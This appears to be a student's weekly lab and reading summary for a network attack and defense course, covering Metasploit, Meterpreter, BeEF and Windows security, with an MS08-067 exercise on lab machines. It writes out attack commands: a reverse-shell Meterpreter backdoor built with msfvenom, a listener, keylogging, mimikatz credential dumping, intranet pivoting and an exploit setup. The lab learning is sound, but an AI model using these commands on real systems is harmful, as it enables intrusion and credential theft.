"Network Attack and Defense Technology and Practice" Week 7 Learning Summary

Video learning summary

1. Retrieval and Exploitation of Vulnerabilities

Exploit Toolset

1.Exploit Database->searchsploit

2.pattern create

Test vulnerability

armitage

combined with MSF for exploitation

3.jboss-autopwn-linux->win

Exploit tool specifically for Jboss

4. tie

Automation is turned on, waiting for the target to visit.

5.termineter

Evaluate the security of smart meters.

2. Metasploit basics of exploit

Metasploit is often used in penetration testing. In fact, this software includes many tools, which constitute a complete attack framework. They may not be the best tools for every aspect of penetration testing, but the combined framework makes it powerful.

1. Start the service

An important component of the Kali vulnerability tool set, you need to start two PostgreSQL database services and metasploit services first, and then you can fully use the msf database to query exploits and records.

service postgresql start 
service metasploit start

It was found that an error was displayed during startup, and the Internet searched for the reason and found that this version has no metasploit service:

The MSF service with database support needs to be opened using the following methods:

etc/init.d/postgresql start 或者 service postgresql start  //启动postgresql数据库
msfdb init //初始化MSF数据库
msfconsole
db_status  //在msf中可以查看数据库连接状态

If you don't want to manually start the service every time you boot, configure the system to start

update-rc.d postgresql enable
update-rc.d metasploit enable

2. Path introduction

msf的路径cd /usr/share/metasploit-framework/
msfencode -l 未找到命令

Auxiliary: Auxiliary module

encoders: For msfencode encoding tools, you can use msfencode -1

exploits: attack module, every article introducing msf will mention the ms08_067_netapi, which is this directory.

Payloads: Listed here are the attack payloads, that is, the code to be executed after the attack is successful. For example, windows/meterpreter/reverse_tcp that we often set is under this folder.

post: The post-penetration stage module, the attack code that can be used after obtaining the shell of the meterpreter. For example, the commonly used hashdump and arp_scanner are here.

3. Basic commands

msfpayload: used to generate payload or shellcode
When searching, you can use the command msfpayload -l |grep "windows" to query the
-o option to list the parameters required by the payload
msfencode: the encoder in msf, in the early days to bypass AV for encoding Now commonly used msfpayload encoding with it to avoid the bad string of exploit. Using it as an attack payload can obtain a link to a meterpretershell of the target system.
msfconsole:
Open metasploit's console

4. Test example: find vulnerabilities, search for exploits

Test the metasploit tool with SSH username enumeration attack, use the winxpserver target machine, the IP address is 192.168.92.148, and then use nmap to detect the port service version opened by the target machine:

The scan shows that the target 21 port vsftpd version is 5.0. Use the command in msf opened by msfconsole to search vsftpdcheck whether there is a corresponding exploit:

5. Test example: select exploit to view parameters.

Select the tool marked in the figure above, enumerate the ssh username, then use the command use to use the tool, select exploit, and view the parameters:

6. Test example: select payload

Required shows yes, indicating that it needs to be set. Set the remote IP address:

7. Test Example: Setting Parameters

Use the set command to set parameters, indicating that the parameters have been set.

8. Test Example: Execute Attack Test

Enter exploit to test the attack. If successful, a shell will be returned, and a green UID will appear, indicating that the attack is successful. At this time, you can view the IP of the target machine and cat to some information.

3. Meterpreter for Vulnerability Detection

Meterpreter is an extension module in the Metasploit framework and is used as an attack payload after a successful overflow. The attack payload returns us a control channel after a successful overflow attack. Using it as an attack payload can obtain a link to a Meterpretershell of the target system.

As a post-penetration module, Meterpreter has many types, and the commands are composed of core commands and extended library commands, which greatly enriches the attack methods. It has many functions, such as adding a user, hiding something, opening a shell, getting user password, uploading and downloading files from remote hosts, running cmd.exe, capturing screen, getting remote control, capturing keystrokes, clearing applications, Display the system information of the remote host, display the network interface and IP address of the remote machine, etc.

Common commands:

background Put the current session in the background

load/use Load the module

interact Switch to a channel

migrate Migration process

run Execute an existing module

Resource Execute an existing rc script Common meterpreter types:

payload windows/meterpreter/reverse_tcp

1. Generate meterpreter backdoor:

使用命令：msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.92.150 LPORT=2333 R | msfencode -t exe -c 5 > /root/door.exe

It is found that it cannot be displayed after the setting is successful, because the msfpayload under the new version of kali has been removed. In the future, just use msfvenom, which integrates the functions of msfpayload and msfencode:

So the command to generate the meterpreter backdoor is equivalent to:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.92.150 LPORT=2333 -i 5 -f exe /root/door.exe

Generated successfully, move it into the XP system:

2. Open MSF and enable monitoring

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options
set LPORT 2333

Modify the listening port:

3. Execute door.exe on the target host

Execute exploit in kali's msf to start listening:

4. View executable commands through the help command:

5. Common command usage

6. Capture the screen, you can see that the capture results are saved under root

7. Keyboard monitoring

开启服务：keyscan_dump
关闭服务:keyscan_stop

8. Extension tool: load

9. Load mimikatz of extension tools

Grab the local password plaintext:

Found one more mimikatz command:

To get credentials, enter the command: wdigest

4. Metasploit post-penetration testing for vulnerability detection

After the springboard machine obtains a certain authority, it needs to actively develop the authority of the intranet host, obtain the specified target information, and explore the loopholes of the system. With the help of the loopholes in the system and the meterpreter backdoor already obtained by Msf, the series of operations can be made easier.

1. Check the network card of the springboard

ifconfig

2. Add routing table

run autoroute -s 10.0.0.1

This is the most commonly used method in Metasploit. After adding the relationship between the routing table and the session, you can use the module in msf to scan or attack across network segments.

3. Open socks proxy

By using the auxiliary/server/socks4a module, create a socks proxy that can be used by browsers, Sqlmap, Nmap, etc.

background 把session置于后台
search socks  使用socks开代理
use auxiliary/server/socks4a
showoptions
exploit

4. You can freely switch to session through background and sessions -i

5. Enter run to see many commands that can be done on meterpreter

6. You can see the modules of the post penetration test through run post/

7. Scan intranet information

run arp_scanner -r 目标IP地址<br>
内网端口转发<br>
upload lcx.exe c:\ 上传到C盘根目录<br>

8. You can also upload files and do port forwarding for subsequent testing

V. BeeF for Vulnerability Detection

The use of XSS vulnerabilities requires a strong framework support. BeeF is the abbreviation of browser attack framework, which is an infiltration tool focused on the browser side.

1. Start BeeF from the command line

Just use the command beef-xss directly, open the browser, it will automatically jump to the beef login page:

默认用户名：beef
密码：beef

You can enter the main interface:

2. Assume that the host under test requests to

Test utilization: Enter the URL http://127.0.0.1:3000/demos/basic.html to enter a test page:

In this way, you can see an online host at the left end of the main interface:

3. The duration of HOOK is until the test page is closed. During this period, it is equivalent to being controlled. Attack commands can be sent. In the Commands module, we can complete many tasks.

in. The colors in 4 indicate:

the attack module is available and has strong concealment.

The attack module is available but the concealment is poor.

Whether the user module is available or not has yet to be verified .

The attack module is unavailable.

4. Select the Raw JavaScript module under MISC as the test case

There is a table with a detailed description of the module, as well as some optional parameters. Feel free to enter good morning and click Execute to attack:

After execution, you can see the following renderings on the target page:

5.Proxy function

Select the target host, right-click, select use as proxy in the menu, and then edit and send the content you want to send in the forge request in the rider tab:

After the information is sent, you can see it through the History option. After the transmission is successful, click the corresponding information to display the detailed transmission process:

6. BeeF combined with Metasploit to load

BeeF does not load Metasploit by default. If you want to use Metasploit's rich attack modules, you need to do some configuration:

Modify the file config.yaml and

open a msfconsole

to see that there are many more modules available under Metasploit.

Modify the Metasploit line in /usr/share/beef-xss/config.yaml to true:

Make sure that the IP and other information here are set correctly, and modify the custom path:

After configuration, open msfconsole and run the command:

load msgrpc ServerHost=192.168.92.150 Pass=abc123

Enter the path cd /usr/share/beef-xss/
and execute the ./beef -x command

Restart beef and find that many Metasploit attack modules have been loaded:

The seventh chapter of the textbook is the summary of Windows operating system security attack and defense learning

1. Basic framework of Windows operating system

1. The basic structure of windows is divided into the operating system kernel running in the privileged mode of the processor and the user running in the unprivileged mode of the processor, namely kernel mode and user mode.

2, the core mechanism: process and thread management mechanism, memory management mechanism, file management mechanism, registry management mechanism, network management mechanism.

3. Network management mechanism: network card hardware driver (physical layer), NDIS library and miniport driver (link layer), TDI transport layer (network protocol driver) (network layer and transport layer), network APID and TDI client ( session layer and presentation layer), network applications and service processes (application layer).

2. Security Architecture and Mechanism of Windows Operating System

1. Monitor model: The access from the subject to the object is mediated by the monitor, and the reference monitor conducts authorized access according to the security access control policy, and all access records are generated by the monitor to generate audit logs.

2. Core: SRM security reference monitoring (in the kernel), LSASS security service (user mode), winlogon/netlogn, and Eventlog

3. Authentication mechanism: security subject: user, user group, computer authentication: local authentication (winlogon Process, GINA graphical login window and LSASS service), network authentication (NTLM, Lanman, kerberos)

4. Authorization and access control mechanisms: objects: files, directories, registry keys, kernel objects, synchronization objects, private objects, Pipes, memory, communication interfaces. Attribute composition: Owner SID, Group SID, DACL autonomous access control list, SACL system audit access control list.

5. Security audit mechanism

6. Other security mechanisms: Security Center (firewall, automatic patch update, virus protection), IPsec loading and verification mechanism, EPS encrypted file system, windows file protection mechanism, privacy protection provided by the bundled IE browser and browser security protection mechanisms.

3. Windows remote security attack and defense technology

1. Including remote password guessing attack, windows network service attack, windows client and user attack.

2. Remote password guessing attack: Remote password guessing: SMB protocol (tcp445, tcp139), others include WMI service, TS remote desktop terminal service, MY SQL database service, SharePoint.

3 Prevention of remote password guessing: turn off unnecessary vulnerable network services, configure host firewalls to restrict certain port services, network firewalls restrict access to these services, disable outdated and security flawed Lanman and NTLM, specify strong Password Policy.

4. Remote penetration attacks on network services: well-known vulnerabilities and attacks on NETBIOS services, well-known vulnerabilities and attacks on SMB services, well-known vulnerabilities and attacks on MSRPC services, remote penetration attacks on Microsoft networks on Windows systems, on Windows systems Remote penetration attacks of third-party services.
5. Preventive measures for remote penetration of network services: The most basic thing is to try to avoid and eliminate the security vulnerabilities of the service software that these penetration attacks rely on.

Four, Windows local security attack and defense technology

1. Local privilege escalation attack: Exploiting security flaws and vulnerabilities in the operating system kernel and privileged user startup programs, because the server and desktop systems are not immediately patched.

2. Sensitive information theft: Windows system password ciphertext extraction technology (copy password ciphertext file, rdisk tool backup, pwdumpx extract password ciphertext from SAM file or active directory) Windows system password cracking technology, user sensitive data theft: find , findstr, grep, meterpreter

3. Local sensitive information theft prevention: choose high-strength, high-defense passwords, use more secure encrypted plaintext algorithms, and configure policies securely.

5. Windows attack experiment

Experiment description:

Use Metaspoit to attack MS08-067, and submit screenshots (no less than five) of the process of getting the remote shell correctly.

MS08-067 Vulnerability Introduction

The MS08-067 vulnerability, known as the Windows Server Service RPC Request Buffer Overflow Vulnerability, could allow remote code execution if a user receives a specially crafted RPC request on an affected system. On Microsoft Windows 2000, Windows XP and Windows Server 2003 systems, an attacker could exploit this vulnerability to run arbitrary code without authentication. This vulnerability can be used for worm attacks, and there are already worms that exploit this vulnerability.

experimental tool

The attack aircraft used in this experiment is kali, and the target aircraft is Win2kServer

攻击机：192.168.92.147
靶机：192.168.92.148

Experimental steps:

1. First, the attack aircraft and the target aircraft ping each other, and open msfconsole in the kali terminal

2. Check whether there is a ms08_067 vulnerability, check the returned information, and the found penetration module will be displayed

3. Enter the command use exploit/windows/smb/ms08_067_netapi to enter the exploit module. Then you can enter some commands to display some information, such as:

输入show payloads会显示出有效的攻击载荷，比如shell_reverse_tcp

使用命令set payload generic/shell_reverse_tcp设置攻击有效载荷

输入show targets会显示出可以被攻击的靶机的操作系统型号

4. Enter show options to display the data we need to set before attacking

5. Set the address of the attack aircraft and target aircraft, and use the command show options to view the payload status again

输入命令set LHOST + 攻击机IP，即set LHOST 192.168.92.147;
输入命令set RHOST + 靶机IP，即set RHOST 192.168.92.148；

2017-2018-2 20179205 "Network Attack and Defense Technology and Practice" Week 7 Homework